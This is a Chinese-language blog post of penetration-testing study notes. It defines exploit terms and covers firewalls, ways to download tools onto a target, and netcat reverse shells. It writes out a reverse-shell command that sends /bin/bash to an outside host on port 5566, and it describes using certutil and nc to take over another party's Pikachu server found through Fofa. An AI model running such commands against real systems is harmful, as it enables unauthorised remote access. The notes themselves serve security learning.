Web学习1

Web
发布时间 :
  1. 名词解释
  2. 权限
  3. 防火墙
  4. 文件上传下载-解决无图形化&解决数据传输
  5. 反弹shell命令-解决数据回显&解决数据通讯
  6. 实例1(防火墙绕过-正向连接&反向连接&内网服务器)
  7. 实例2:Fofa拿下同行Pikachu服务器
  8. 总结

名词解释

POC:全称”Proof of Concept”,中文’概念验证’,常指一段漏洞证明的代码。
EXP:全称”Exploit”,中文”利用“,指利用系统漏洞进行攻击的动作。
Payload:中文“有效载荷”,指成功exploit之后,真正在目标系统之星的代码或指令。
Shellcode:简单翻译“shell代码”,是Payload的一种,由于其建立正向/反向shell而得名。
黑盒测试:黑盒测试是一种软件测试方法,测试人员在没有了解内部实现细节的情况下,对系统进行测试。测试人员只关注系统的输入和输出,目的是评估系统的功能和安全性。
白盒测试:白盒测试是一种软件测试方法,测试人员具有对系统内部的详细了解,包括代码和结构。测试人员可以检查系统的内部逻辑和实现,以评估系统的正确性和安全性。
社会工程学:社会工程学是一种欺骗性的攻击方法,通过对人类心理和行为的研究,以及各种欺骗手段,骗取他人的信息或获取未授权的访问权限。
木马:木马(Trojan horse)是一种隐藏在看似合法的程序中的恶意软件。它通过欺骗用户,使其误以为这是一个有用的软件,但实际上会在用户不知情的情况下执行某种恶意操作,如窃取信息、开启后门等。
后门/Webshell:Webshell是一种恶意软件,通常以脚本或小型程序的形式嵌入到受攻击的Web服务器中。攻击者通过Webshell可以执行远程命令,获取服务器的敏感信息,甚至对服务器进行完全的控制。

权限

文件权限,服务权限,用户权限 -> 提权
权限体现:文件能否删除,能否修改
查询用户名命令:whoami( Linux中 whoami 命令用于显示自身用户名称。)
Administrator是一个组,组没有权限,组下的用户也会没有权限访问文件。
提权的作用:能够进行更多的命令操作
取得管理员权限,是无法把系统直接删掉的,需要进行提权操作,取得系统权限才可以。

防火墙

linux自带的防火墙:iptables
内网渗透测试:走的协议与一般测试不同,走tcp协议
防火墙的出站与入站:出站是从本地计算机访问外部网络,例如浏览器发起请求访问网站,入站是从外部网络访问本地计算机,例如使用 localsend 将文件从手机(外部网络)传送到本地计算机。

文件上传下载-解决无图形化&解决数据传输

Linux:wget curl(linux自带的) python ruby perl java等
Windows: PowerShell Certutil Bitsadmin msiexec mshta rund1132等

可以下载自己所需要的渗透工具到对方的服务器里

反弹shell命令-解决数据回显&解决数据通讯

反弹名词解释:将权限移植到另一个地方
useradd 用户名 passwd 用户名
passwd:修改用户名的密码
测试Linux系统添加用户或修改密码命令交互回显问题

实例1(防火墙绕过-正向连接&反向连接&内网服务器)

正向连接:我主动找你
反向连接:别人来找我
要看是以谁为参照物
windows进行nc操作,是windows正向连接linux,linux收到windows的数据,是进行了反向连接。

在学校的内网可以直接控制阿里云的外网服务器,但是阿里云在进行回显的时候并不知道将数据回显到哪台电脑。

内网->aliyun 可以
aliyun->内网 不可以
因为aliyun无法分辨哪个电脑对应着数据的来源
解决方法:进行端口映射,当外网将数据传输到内网时,当端口为5577时,自动映射到C电脑,这样就可以解决无法反弹的问题。

1
2
3
4
5
nc介绍:nc是netcat的简写,是一个功能强大的网络工具,有着网络界的瑞士军刀美誉。nc命令在linux系统中实际命令是ncat,nc是软连接到ncat。nc命令的主要作用如下:
实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口
端口的扫描,nc可以作为client发起TCP或UDP连接
机器之间传输文件
机器之间网络测速

nc可以将本地cmd的权限移交到外网上去
ping 命令可以得到网站的ip地址

-lvvp可以监听5577端口

成功接收到内网传输的数据,完成了一次成功的反弹shell,此时我在真机上执行什么命令,虚拟机上也会相应的执行对应的命令,因为它已经把cmd的权限交给真机了。

image-20240522221542195

在真机上执行命令ncat www.xiaodi8.com 5566 -e /bin/bash
在虚拟机上执行nc -lvvp 5566 即可完成一次反弹shell
防火墙可以将nc连接的命令过滤掉,这是防火墙的作用之一
防火墙默认设置:出松进紧

实例2:Fofa拿下同行Pikachu服务器

文件下载&反弹shell:
certutil -urlc

先判断哪个ip地址可以ping通,

下载nc文件到对方服务器

反弹shell到5566端口自己的服务器

用自己的服务器监听,看回显,成功get shell,服务器到手。

总结

操作系统:文件下载、反弹shell(正向反向连接)、用途(个人用机,服务器用机)、命令(windows-cmd、powershell,linux)、权限、防火墙(出站,入站),网络(内网&外网)
专有名词:前后端,POC/EXP,Payload/Shellcode,后门/Webshell,木马/病毒,反弹,回显,跳板,黑白盒测试,暴力破解,社会工程学,撞库,attack等

©2024 f4k3r

Built with Hexo and 3-hexo theme